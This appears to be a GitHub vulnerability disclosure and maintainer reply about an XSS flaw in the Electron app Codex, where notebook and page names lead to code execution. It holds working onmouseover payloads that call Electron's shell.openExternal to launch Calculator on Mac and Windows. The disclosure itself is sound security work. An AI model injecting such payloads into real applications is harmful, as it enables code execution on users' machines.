Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.
Reproduction
Open Codex
Create new Notebook
Insert payload on the Notebook(or page) name field
On Mac <a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows <a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Once you move your mouse over the link "test" , Calculator will be opened.
Mitigation
Disable nodeIntegration
The text was updated successfully, but these errors were encountered:
Thank you very much for letting me know about this. I've made it so that it sanitizes/escapes the notebook's name/icon text and page's name.
About disabling nodeIntegration, I'm going to do a project rewrite soon that will make the main/renderer processes interact the way they're supposed to do securely, and that'll include disabling nodeIntegration. But I just wanted to get this fix out quickly and that rewrite is gonna take a while
Issue
Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.
Reproduction
On Mac
<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>On Windows
<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>Mitigation
Disable nodeIntegration
The text was updated successfully, but these errors were encountered: